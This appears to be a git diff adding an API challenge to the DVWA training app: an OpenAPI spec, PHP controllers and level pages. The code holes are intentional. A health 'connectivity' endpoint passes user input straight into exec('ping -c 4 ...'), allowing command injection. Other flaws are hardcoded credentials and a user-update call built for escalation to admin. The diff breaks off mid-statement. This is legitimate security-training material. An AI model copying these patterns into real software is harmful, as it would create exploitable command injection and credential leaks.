+ - + name: id + in: path + required: true + schema: + type: integer + responses: + '200': + description: 'Successful operation.' + content: + application/json: + schema: + $ref: '#/components/schemas/Order' + '404': + description: 'Order not found.' + security: + - + scalar: basicAuth + put: + tags: + - order + description: 'Update an order by ID.' + operationId: updateOrder + parameters: + - + name: id + in: path + required: true + schema: + type: integer + requestBody: + description: 'New order data.' + content: + application/json: + schema: + $ref: '#/components/schemas/OrderUpdate' + responses: + '200': + description: 'Successful operation.' + content: + application/json: + schema: + $ref: '#/components/schemas/Order' + '404': + description: 'Order not found' + '422': + description: 'Invalid order object provided' + delete: + tags: + - order + description: 'Delete order by ID.' + operationId: deleteOrderById + parameters: + - + name: id + in: path + required: true + schema: + type: integer + responses: + '200': + description: 'Successful operation.' + '404': + description: 'Order not found' + /vulnerabilities/api/v2/order/: + get: + tags: + - order + description: 'Get all orders.' + operationId: getOrders + responses: + '200': + description: 'Successful operation.' + content: + application/json: + schema: + type: array + items: + $ref: '#/components/schemas/Order' + post: + tags: + - order + description: 'Create a new order.' + operationId: addOrder + requestBody: + description: 'Order data.' + content: + application/json: + schema: + $ref: '#/components/schemas/OrderAdd' + responses: + '200': + description: 'Successful operation.' + content: + application/json: + schema: + $ref: '#/components/schemas/Order' + '422': + description: 'Invalid order object provided' + '/vulnerabilities/api/v2/user/{id}': + get: + tags: + - user + description: 'Get a user by ID.' + operationId: getUserByID + parameters: + - + name: id + in: path + required: true + schema: + type: integer + responses: + '200': + description: 'Successful operation.' + content: + application/json: + schema: + $ref: '#/components/schemas/User' + '404': + description: 'User not found.' + put: + tags: + - user + description: 'Update a user by ID.' + operationId: updateUser + parameters: + - + name: id + in: path + required: true + schema: + type: integer + requestBody: + description: 'New user data.' + content: + application/json: + schema: + $ref: '#/components/schemas/UserUpdate' + responses: + '200': + description: 'Successful operation.' + content: + application/json: + schema: + $ref: '#/components/schemas/User' + '404': + description: 'User not found' + '422': + description: 'Invalid user object provided' + delete: + tags: + - user + description: 'Delete user by ID.' + operationId: deleteUserById + parameters: + - + name: id + in: path + required: true + schema: + type: integer + responses: + '200': + description: 'Successful operation.' + '404': + description: 'User not found' + /vulnerabilities/api/v2/user/: + get: + tags: + - user + description: 'Get all users.' + operationId: getUsers + responses: + '200': + description: 'Successful operation.' + content: + application/json: + schema: + type: array + items: + $ref: '#/components/schemas/User' + post: + tags: + - user + description: 'Create a new user.' + operationId: addUser + requestBody: + description: 'User data.' + content: + application/json: + schema: + $ref: '#/components/schemas/UserAdd' + responses: + '200': + description: 'Successful operation.' + content: + application/json: + schema: + $ref: '#/components/schemas/User' + '422': + description: 'Invalid user object provided' +components: + schemas: + Target: + required: + - target + properties: + target: + type: string + example: digi.ninja + type: object + Words: + required: + - words + properties: + words: + type: string + example: 'Hello World' + type: object + Credentials: + required: + - username + - password + properties: + username: + type: string + example: user + password: + type: string + example: password + type: object + Order: + properties: + id: + type: integer + example: 1 + name: + type: string + example: 'Tony Hart' + address: + type: string + example: 'BBC Television Centre, London W3 6XZ' + items: + type: string + example: '1 * brush, 2 * paints, 1 * easel' + status: + type: integer + example: 1 + type: object + OrderAdd: + required: + - level + - name + properties: + name: + type: string + example: fred + address: + type: string + example: '1 High Street, Atown' + items: + type: string + example: '2 * brushes' + type: object + OrderUpdate: + properties: + name: + type: string + example: fred + address: + type: string + example: '1 High Street, Atown' + items: + type: string + example: '2 * brushes' + type: object + Token: + required: + - token + properties: + token: + type: string + example: '11111' + type: object + User: + properties: + id: + type: integer + example: 1 + name: + type: string + example: fred + level: + type: integer + example: 1 + type: object + UserAdd: + required: + - level + - name + properties: + name: + type: string + example: fred + level: + type: integer + example: 1 + type: object + UserUpdate: + required: + - name + properties: + name: + type: string + example: fred + type: object + securitySchemes: + http: + type: http + name: authorization +tags: + - + name: user + description: 'User operations.' + - + name: health + description: 'Health operations.' + - + name: order + description: 'Order operations.' + - + name: login + description: 'Login operations.' diff --git a/DVWA/vulnerabilities/api/public/index.php b/DVWA/vulnerabilities/api/public/index.php new file mode 100644 index 00000000..36aebd36 --- /dev/null +++ b/DVWA/vulnerabilities/api/public/index.php @@ -0,0 +1,100 @@ + $dir) { + if ($dir == "order" || $dir == "user" || $dir == "health" || $dir == "login") { + $local_uri = array_slice ($uri, $pos - 1); + break; + } +} + +// All of our endpoints start with /api/v[0-9] +// everything else results in a 404 Not Found + +if (count($local_uri) < 2) { + header("HTTP/1.1 404 Not Found"); + exit(); +} + +$requestMethod = $_SERVER["REQUEST_METHOD"]; + +$version = $local_uri[0]; + +if (preg_match ("/v([0-9]*)/", $version, $matches)) { + $version = intval ($matches[1]); +} else { + header("HTTP/1.1 404 Not Found"); + exit(); +} +$controller = $local_uri[1]; + +switch ($controller) { + case "order": + // the user id is, of course, optional and must be a number: + $orderId = null; + if (isset($local_uri[2]) && $local_uri[2] != "") { + $orderId = intval($local_uri[2]); + } + + // pass the request method and order ID to the OrderController and process the HTTP request: + $controller = new OrderController($requestMethod, $version, $orderId); + $controller->processRequest(); + break; + case "user": + // the user id is, of course, optional and must be a number: + $userId = null; + if (isset($local_uri[2])) { + $userId = (int) $local_uri[2]; + } + + // pass the request method and user ID to the UserController and process the HTTP request: + $controller = new UserController($requestMethod, $version, $userId); + $controller->processRequest(); + break; + case "health": + if (!isset($local_uri[2])) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + break; + } + + $command = $local_uri[2]; + $controller = new HealthController($requestMethod, $version, $command); + $controller->processRequest(); + break; + case "login": + if (!isset($local_uri[2])) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + break; + } + + $command = $local_uri[2]; + $controller = new LoginController($requestMethod, $version, $command); + $controller->processRequest(); + break; + default: + $gc = new GenericController("notFound"); + $gc->processRequest(); + break; +} diff --git a/DVWA/vulnerabilities/api/source/high.php b/DVWA/vulnerabilities/api/source/high.php new file mode 100644 index 00000000..61b3a243 --- /dev/null +++ b/DVWA/vulnerabilities/api/source/high.php @@ -0,0 +1,14 @@ + + Here is the OpenAPI document, have a look the health functions and see if you can find one that has a vulnerability. +

    +

    + You might be able to work out how to call the individual functions by hand, but it would be a lot easier to import it into an application such as Swagger UI, Burp, ZAP, or Postman and let the tool do the hard work of setting the requests up for you. +

    +"; + +?> diff --git a/DVWA/vulnerabilities/api/source/impossible.php b/DVWA/vulnerabilities/api/source/impossible.php new file mode 100644 index 00000000..aec173b9 --- /dev/null +++ b/DVWA/vulnerabilities/api/source/impossible.php @@ -0,0 +1,22 @@ + + Rather than try to develop a perfect API, there is a different type of challenge for this level. +

    +

    + The order system uses OAuth 2.0 for authentication. Being able to automate using this in your tools will greatly help with efficiency, removing the need to manually login and copy access tokens around. Use this level to practice setting up OAuth 2.0 in your testing tool of choice, for me this is Postman which is then proxied through Burp, but you can pick whatever tools are most appropriate for your testing environment. +

    +

    + Here are some guides that might help: +

    + + +"; + +?> diff --git a/DVWA/vulnerabilities/api/source/low.php b/DVWA/vulnerabilities/api/source/low.php new file mode 100644 index 00000000..e1123e35 --- /dev/null +++ b/DVWA/vulnerabilities/api/source/low.php @@ -0,0 +1,118 @@ + + Versioning is important in APIs, running multiple versions of an API can allow for backward compatibility and can allow new services to be added without affecting existing users. The downside to keeping old versions alive is when those older versions contain vulnerabilities. +

    +"; + +$html .= " + +"; + +$html .= " + + + + + + + +
    + + +

    + Look at the call used to create this table and see if you can exploit it to return some additional information. +

    + + +"; + +?> diff --git a/DVWA/vulnerabilities/api/source/medium.php b/DVWA/vulnerabilities/api/source/medium.php new file mode 100644 index 00000000..2c980de1 --- /dev/null +++ b/DVWA/vulnerabilities/api/source/medium.php @@ -0,0 +1,95 @@ + + function update_username(user_json) { + console.log(user_json); + var user_info = document.getElementById ('user_info'); + var name_input = document.getElementById ('name'); + + if (user_json.name == '') { + user_info.innerHTML = 'User details: unknown user'; + name_input.value = 'unknown'; + } else { + var level = 'unknown'; + if (user_json.level == 0) { + level = 'admin'; + successDiv = document.getElementById ('message'); + successDiv.style.display = 'block'; + } else { + level = 'user'; + } + user_info.innerHTML = 'User details: ' + user_json.name + ' (' + level + ')'; + name_input.value = user_json.name; + } + } + + function get_user() { + const url = '/vulnerabilities/api/v2/user/2'; + + fetch(url, { + method: 'GET', + }) + .then(response => { + if (!response.ok) { + throw new Error('Network response was not ok'); + } + return response.json(); + }) + .then(data => { + update_username (data); + }) + .catch(error => { + console.error('There was a problem with your fetch operation:', error); + }); + } + + function update_name() { + const url = '/vulnerabilities/api/v2/user/2'; + const name = document.getElementById ('name').value; + const data = JSON.stringify({name: name}); + + fetch(url, { + method: 'PUT', + headers: { + 'Content-Type': 'application/json' + }, + body: data + }) + .then(response => { + if (!response.ok) { + throw new Error('Network response was not ok'); + } + return response.json(); + }) + .then(data => { + update_username(data); + }) + .catch(error => { + console.error('There was a problem with your fetch operation:', error); + }); + } + +"; + +$html .= " +

    + Look at the call used to update your name and exploit it to elevate your user to admin (level 0). +

    +

    +
    +

    + + +

    +

    + +

    +
    + + +"; + +?> diff --git a/DVWA/vulnerabilities/api/src/GenericController.php b/DVWA/vulnerabilities/api/src/GenericController.php new file mode 100644 index 00000000..c1fa518c --- /dev/null +++ b/DVWA/vulnerabilities/api/src/GenericController.php @@ -0,0 +1,80 @@ +command = $command; + } + + private function optionsResponse() { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = null; + return $response; + } + + private function unprocessableEntityResponse() + { + $response['status_code_header'] = 'HTTP/1.1 422 Unprocessable Entity'; + $response['body'] = json_encode([ + 'error' => 'Invalid input' + ]); + return $response; + } + + private function notFoundResponse() { + $response['status_code_header'] = 'HTTP/1.1 404 Not Found'; + $response['body'] = null; + return $response; + } + + private function methodNotSupported() { + $response['status_code_header'] = 'HTTP/1.1 405 Method Not Supported'; + $response['body'] = null; + return $response; + } + + private function teapotResponse() { + $response['status_code_header'] = "HTTP/1.1 418 I'm a teapot"; + $response['body'] = null; + return $response; + } + + public function processRequest() { + switch ($this->command) { + case "teapot": + $response = $this->teapotResponse(); + break; + case "notfound": + $response = $this->notFoundResponse(); + break; + case "notSupported": + $response = $this->methodNotSupported(); + break; + case "unprocessable": + $response = $this->unprocessableEntityResponse(); + break; + case "options": + $response = $this->optionsResponse(); + break; + default: + $response = $this->notFoundResponse(); + break; + }; + header($response['status_code_header']); + if ($response['body']) { + echo $response['body']; + } + exit(); + } +} diff --git a/DVWA/vulnerabilities/api/src/HealthController.php b/DVWA/vulnerabilities/api/src/HealthController.php new file mode 100644 index 00000000..e828505e --- /dev/null +++ b/DVWA/vulnerabilities/api/src/HealthController.php @@ -0,0 +1,200 @@ +requestMethod = $requestMethod; + $this->command = $command; + } + + #[OAT\Post( + tags: ["health"], + path: '/vulnerabilities/api/v2/health/echo', + operationId: 'echo', + description: 'Echo, echo, cho, cho, o o ....', + parameters: [ + new OAT\RequestBody ( + description: 'Your words.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: Words::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + ] + ) + ] + + private function echo() { + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (array_key_exists ("words", $input)) { + $words = $input['words']; + + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("reply" => $words)); + } else { + $response['status_code_header'] = 'HTTP/1.1 500 Internal Server Error'; + $response['body'] = json_encode (array ("status" => "Words not specified")); + } + return $response; + } + + #[OAT\Post( + tags: ["health"], + path: '/vulnerabilities/api/v2/health/connectivity', + operationId: 'checkConnectivity', + description: 'The server occasionally loses connectivity to other systems and so this can be used to check connectivity status.', + parameters: [ + new OAT\RequestBody ( + description: 'Remote host.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: Target::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + ] + ) + ] + + private function checkConnectivity() { + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (array_key_exists ("target", $input)) { + $target = $input['target']; + + exec ("ping -c 4 " . $target, $output, $ret_var); + + if ($ret_var == 0) { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("status" => "OK")); + } else { + $response['status_code_header'] = 'HTTP/1.1 500 Internal Server Error'; + $response['body'] = json_encode (array ("status" => "Connection failed")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 500 Internal Server Error'; + $response['body'] = json_encode (array ("status" => "Target not specified")); + } + return $response; + } + + #[OAT\Get( + tags: ["health"], + path: '/vulnerabilities/api/v2/health/status', + operationId: 'getHealthStatus', + description: 'Get the health of the system.', + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + ] + ) + ] + + private function getStatus() { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("status" => "OK")); + return $response; + } + + #[OAT\Get( + tags: ["health"], + path: '/vulnerabilities/api/v2/health/ping', + operationId: 'ping', + description: 'Simple ping/pong to check connectivity.', + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + ] + ) + ] + private function ping() { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("Ping" => "Pong")); + return $response; + } + + public function processRequest() { + switch ($this->requestMethod) { + case 'POST': + switch ($this->command) { + case "echo": + $response = $this->echo(); + break; + case "connectivity": + $response = $this->checkConnectivity(); + break; + default: + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + }; + break; + case 'GET': + switch ($this->command) { + case "status": + $response = $this->getStatus(); + break; + case "ping": + $response = $this->ping(); + break; + default: + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + }; + break; + case 'OPTIONS': + $gc = new GenericController("options"); + $gc->processRequest(); + break; + default: + $gc = new GenericController("notSupported"); + $gc->processRequest(); + break; + } + header($response['status_code_header']); + if ($response['body']) { + echo $response['body']; + } + } +} + +#[OAT\Schema(required: ['target'])] +final class Target { + #[OAT\Property(example: "digi.ninja")] + public string $target; +} + +#[OAT\Schema(required: ['words'])] +final class Words { + #[OAT\Property(example: "Hello World")] + public string $words; +} + diff --git a/DVWA/vulnerabilities/api/src/Helpers.php b/DVWA/vulnerabilities/api/src/Helpers.php new file mode 100644 index 00000000..d7d5a59b --- /dev/null +++ b/DVWA/vulnerabilities/api/src/Helpers.php @@ -0,0 +1,15 @@ + "Invalid content type, expected JSON")); + return $response; + } + } +} diff --git a/DVWA/vulnerabilities/api/src/Login.php b/DVWA/vulnerabilities/api/src/Login.php new file mode 100644 index 00000000..8b82f620 --- /dev/null +++ b/DVWA/vulnerabilities/api/src/Login.php @@ -0,0 +1,48 @@ + $tokenObj->create_token(self::ACCESS_TOKEN_SECRET, $now + self::ACCESS_TOKEN_LIFE), + "refresh_token" => $tokenObj->create_token(self::REFRESH_TOKEN_SECRET, $now + self::REFRESH_TOKEN_LIFE), + "token_type" => "bearer", + "expires_in" => self::ACCESS_TOKEN_LIFE) + ); + return $token; + } + + public static function check_access_token($token) { + $tokenObj = new Token(); + $decrypted = $tokenObj->decrypt_token ($token); + + if ($decrypted === false) { + return false; + } + if ($decrypted['secret'] == self::ACCESS_TOKEN_SECRET && $decrypted['expires'] > time()) { + return true; + } + return false; + } + + public static function check_refresh_token($token) { + $tokenObj = new Token(); + $decrypted = $tokenObj->decrypt_token ($token); + + if ($decrypted['secret'] == self::REFRESH_TOKEN_SECRET && $decrypted['expires'] > time()) { + return true; + } + return false; + } +} diff --git a/DVWA/vulnerabilities/api/src/LoginController.php b/DVWA/vulnerabilities/api/src/LoginController.php new file mode 100644 index 00000000..fa3e34fd --- /dev/null +++ b/DVWA/vulnerabilities/api/src/LoginController.php @@ -0,0 +1,282 @@ +requestMethod = $requestMethod; + $this->command = $command; + } + + # + # Add one of these for refresh + # + #[OAT\Post( + tags: ["login"], + path: '/vulnerabilities/api/v2/login/login', + operationId: 'login', + description: 'Login as user.', + parameters: [ + new OAT\RequestBody ( + description: 'The login credentials.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: Credentials::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + new OAT\Response( + response: 401, + description: 'Invalid credentials.', + ), + ] + ) + ] + + private function loginJSON() { + $ret = Helpers::check_content_type(); + if ($ret !== true) { + return $ret; + } + + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (array_key_exists ("username", $input) && + array_key_exists ("password", $input)) { + $username = $input['username']; + $password = $input['password']; + + if ($username == "mrbennett" && $password == "becareful") { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("token" => Login::create_token())); + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid credentials")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing credentials")); + } + return $response; + } + + # This is an attempt at an OAUTH2 client password authentication flow + private function login() { + # Default fail, just in case. + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Authentication failed")); + + if (array_key_exists ("PHP_AUTH_USER", $_SERVER) && + array_key_exists ("PHP_AUTH_PW", $_SERVER)) { + $client_id = $_SERVER['PHP_AUTH_USER']; + $client_secret = $_SERVER['PHP_AUTH_PW']; + + # App auth check + if ($client_id == "1471.dvwa.digi.ninja" && $client_secret == "ABigLongSecret") { + + if (array_key_exists ("grant_type", $_POST)) { + switch ($_POST['grant_type']) { + case "password": + if (array_key_exists ("username", $_POST) && + array_key_exists ("password", $_POST)) { + $username = $_POST['username']; + $password = $_POST['password']; + + if ($username == "mrbennett" && $password == "becareful") { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = Login::create_token(); + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid user credentials")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing user credentials")); + } + break; + case "refresh_token": + if (array_key_exists ("refresh_token", $_POST)) { + $refresh_token = $_POST['refresh_token']; + + # Because this is sent in a POST body, any + characters + # get replaced by a space when the URL decode happens. This + # puts them back to plus characters. + $ref = str_replace (" ", "+", $refresh_token); + + if (Login::check_refresh_token($ref)) { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = Login::create_token(); + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid refresh token")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing refresh token")); + } + break; + default: + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Unknown grant type")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing grant type")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid clientid/clientsecret credentials")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing clientid/clientsecret credentials")); + } + + return $response; + } + + private function refresh() { + /* + echo "

    Hello {$_SERVER['PHP_AUTH_USER']}.

    "; + echo "

    You entered {$_SERVER['PHP_AUTH_PW']} as your password.

    "; + */ + $ret = Helpers::check_content_type(); + if ($ret !== true) { + return $ret; + } + + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (array_key_exists ("refresh_token", $input)) { + if (array_key_exists ("grant_type", $input)) { + $token = $input['token']; + if (Login::check_access_token($token)) { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("token" => "Valid")); + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing token")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing token")); + } + return $response; + } + + #[OAT\Post( + tags: ["login"], + path: '/vulnerabilities/api/v2/login/check_token', + operationId: 'check_token', + description: 'Check a token is valid.', + parameters: [ + new OAT\RequestBody ( + description: 'The token to test.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: Token::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + new OAT\Response( + response: 401, + description: 'Token is invalid.', + ), + ] + ) + ] + + private function check_token() { + $ret = Helpers::check_content_type(); + if ($ret !== true) { + return $ret; + } + + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (array_key_exists ("token", $input)) { + $token = $input['token']; + if (Login::check_access_token($token)) { + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode (array ("token" => "Valid")); + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid")); + } + } else { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Missing token")); + } + return $response; + } + + public function processRequest() { + switch ($this->requestMethod) { + case 'POST': + switch ($this->command) { + case "refresh": + $response = $this->login(); + break; + case "login": + $response = $this->login(); + break; + case "check_token": + $response = $this->check_token(); + break; + default: + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + }; + break; + case 'OPTIONS': + $gc = new GenericController("options"); + $gc->processRequest(); + break; + default: + $gc = new GenericController("notSupported"); + $gc->processRequest(); + break; + } + header($response['status_code_header']); + if ($response['body']) { + echo $response['body']; + } + } +} + +#[OAT\Schema(required: ['username', 'password'])] +final class Credentials { + #[OAT\Property(example: "user")] + public string $username; + #[OAT\Property(example: "password")] + public string $password; +} + +/* +Moving this to its own thing +#[OAT\Schema(required: ['token'])] +final class Token { + #[OAT\Property(example: "11111")] + public string $token; +} +*/ diff --git a/DVWA/vulnerabilities/api/src/Order.php b/DVWA/vulnerabilities/api/src/Order.php new file mode 100644 index 00000000..6f96042c --- /dev/null +++ b/DVWA/vulnerabilities/api/src/Order.php @@ -0,0 +1,80 @@ +id = $id; + $this->name = $name; + $this->address = $address; + $this->items = $items; + $this->status = $status; + } + + public function toArray($version) { + $a = array ( + "id" => $this->id, + "name" => $this->name, + "address" => $this->address, + "items" => $this->items, + "status" => $this->status, + ); + + return $a; + } +} + +#[OAT\Schema(required: ['level', 'name'])] +final class OrderAdd +{ + #[OAT\Property(example: "fred")] + public string $name; + + #[OAT\Property(example: "1 High Street, Atown")] + public string $address; + + #[OAT\Property(example: "2 * brushes")] + public string $items; +} + +#[OAT\Schema()] +final class OrderUpdate +{ + #[OAT\Property(example: "fred")] + public string $name; + + #[OAT\Property(example: "1 High Street, Atown")] + public string $address; + + #[OAT\Property(example: "2 * brushes")] + public string $items; +} diff --git a/DVWA/vulnerabilities/api/src/OrderController.php b/DVWA/vulnerabilities/api/src/OrderController.php new file mode 100644 index 00000000..eebe58cd --- /dev/null +++ b/DVWA/vulnerabilities/api/src/OrderController.php @@ -0,0 +1,337 @@ +data = array ( + 1 => new Order (1, "Tony", "BBC Television Centre, London W3 6XZ", "5 * brushes", 0), + 2 => new Order (2, "Morph", "Wooden Box, Corner of the table, The Studio", "plasticine", 0), + 3 => new Order (3, "Nailbrush", "BBC Television Centre, London W3 6XZ", "Spare bristles", 1), + ); + $this->requestMethod = $requestMethod; + $this->orderId = $orderId; + $this->version = $version; + } + + private function checkToken() { + if (array_key_exists ("HTTP_AUTHORIZATION", $_SERVER)) { + $header = $_SERVER['HTTP_AUTHORIZATION']; + $bits = explode (" ", $header); + if (count ($bits) == 2) { + if (strtolower($bits[0]) == "bearer") { + return (Login::check_access_token($bits[1])); + } + } + } + + return false; + } + + private function validateAdd($input) + { + if (! isset($input['name'])) { + return false; + } + if (! isset($input['address'])) { + return false; + } + if (! isset($input['items'])) { + return false; + } + return true; + } + + private function validateUpdate($input) + { + if (isset($input['name']) || isset($input['address']) || isset ($input['items'])) { + return true; + } + return false; + } + + /* + type can be "http", "apiKey", "oauth2", "openIdConnect" + * https://zircote.github.io/swagger-php/guide/cookbook.html#referencing-a-security-scheme + */ + + #[OAT\SecurityScheme( + name :"authorization", + securityScheme :"http", + type :"http", + ) + ] + + #[OAT\Get( + tags: ["order"], + path: '/vulnerabilities/api/v2/order/{id}', + operationId: 'getOrderByID', + description: 'Get a order by ID.', + security: [ "basicAuth" ], + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/Order'), + + ), + new OAT\Response( + response: 404, + description: 'Order not found.', + ), + ] + ) + ] + + private function getOrder($id) + { + if (!$this->checkToken()) { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid or missing token")); + return $response; + } + + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode ($this->data[$id]->toArray($this->version)); + return $response; + } + + #[OAT\Get( + tags: ["order"], + path: '/vulnerabilities/api/v2/order/', + operationId: 'getOrders', + description: 'Get all orders.', + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent( + type: 'array', + items: new OAT\Items(ref: '#/components/schemas/Order') + ) + ), + ] + ) + ] + + private function getAllOrders() { + if (!$this->checkToken()) { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid or missing token")); + return $response; + } + + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $all = array(); + foreach ($this->data as $order) { + $all[] = $order->toArray($this->version); + } + $response['body'] = json_encode($all); + return $response; + } + + #[OAT\Post( + tags: ["order"], + path: '/vulnerabilities/api/v2/order/', + operationId: 'addOrder', + description: 'Create a new order.', + parameters: [ + new OAT\RequestBody ( + description: 'Order data.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: OrderAdd::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/Order'), + ), + new OAT\Response( + response: 422, + description: 'Invalid order object provided', + ), + ] + ) + ] + + private function addOrder() + { + if (!$this->checkToken()) { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid or missing token")); + return $response; + } + + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (! $this->validateAdd($input)) { + $gc = new GenericController("unprocessable"); + $gc->processRequest(); + exit(); + } + $order = new Order(null, $input['name'], $input['address'], $input['items'], 0); + $this->data[] = $order; + $response['status_code_header'] = 'HTTP/1.1 201 Created'; + $response['body'] = json_encode($order->toArray($this->version)); + return $response; + } + + #[OAT\Put( + tags: ["order"], + path: '/vulnerabilities/api/v2/order/{id}', + operationId: 'updateOrder', + description: 'Update an order by ID.', + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + new OAT\RequestBody ( + description: 'New order data.', + content: new OAT\MediaType( + mediaType: 'application/json', + schema: new OAT\Schema(ref: OrderUpdate::class) + ) + ), + + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + content: new OAT\JsonContent (ref: '#/components/schemas/Order'), + ), + new OAT\Response( + response: 404, + description: 'Order not found', + ), + new OAT\Response( + response: 422, + description: 'Invalid order object provided', + ), + ] + ) + ] + + private function updateOrder($id) + { + if (!$this->checkToken()) { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid or missing token")); + return $response; + } + + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + $input = (array) json_decode(file_get_contents('php://input'), TRUE); + if (! $this->validateUpdate($input)) { + $gc = new GenericController("unprocessable"); + $gc->processRequest(); + exit(); + } + if (array_key_exists ("name", $input)) { + $this->data[$id]->name = $input['name']; + } + if (array_key_exists ("address", $input)) { + $this->data[$id]->address = $input['address']; + } + if (array_key_exists ("items", $input)) { + $this->data[$id]->items = $input['items']; + } + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = json_encode ($this->data[$id]->toArray($this->version)); + return $response; + } + + #[OAT\Delete( + tags: ["order"], + path: '/vulnerabilities/api/v2/order/{id}', + operationId: 'deleteOrderById', + description: 'Delete order by ID.', + parameters: [ + new OAT\Parameter(name: 'id', in: 'path', required: true, schema: new OAT\Schema(type: 'integer')), + ], + responses: [ + new OAT\Response( + response: 200, + description: 'Successful operation.', + ), + new OAT\Response( + response: 404, + description: 'Order not found', + ), + ] + ) + ] + + private function deleteOrder($id) { + if (!$this->checkToken()) { + $response['status_code_header'] = 'HTTP/1.1 401 Unauthorized'; + $response['body'] = json_encode (array ("status" => "Invalid or missing token")); + return $response; + } + + if (!array_key_exists ($id, $this->data)) { + $gc = new GenericController("notFound"); + $gc->processRequest(); + exit(); + } + unset ($this->data[$id]); + $response['status_code_header'] = 'HTTP/1.1 200 OK'; + $response['body'] = null; + return $response; + } + + public function processRequest() { + switch ($this->requestMethod) { + case 'GET': + if (isset ($this->orderId) && is_numeric ($this->orderId)) { + $response = $this->getOrder($this->orderId); + } else { + $response = 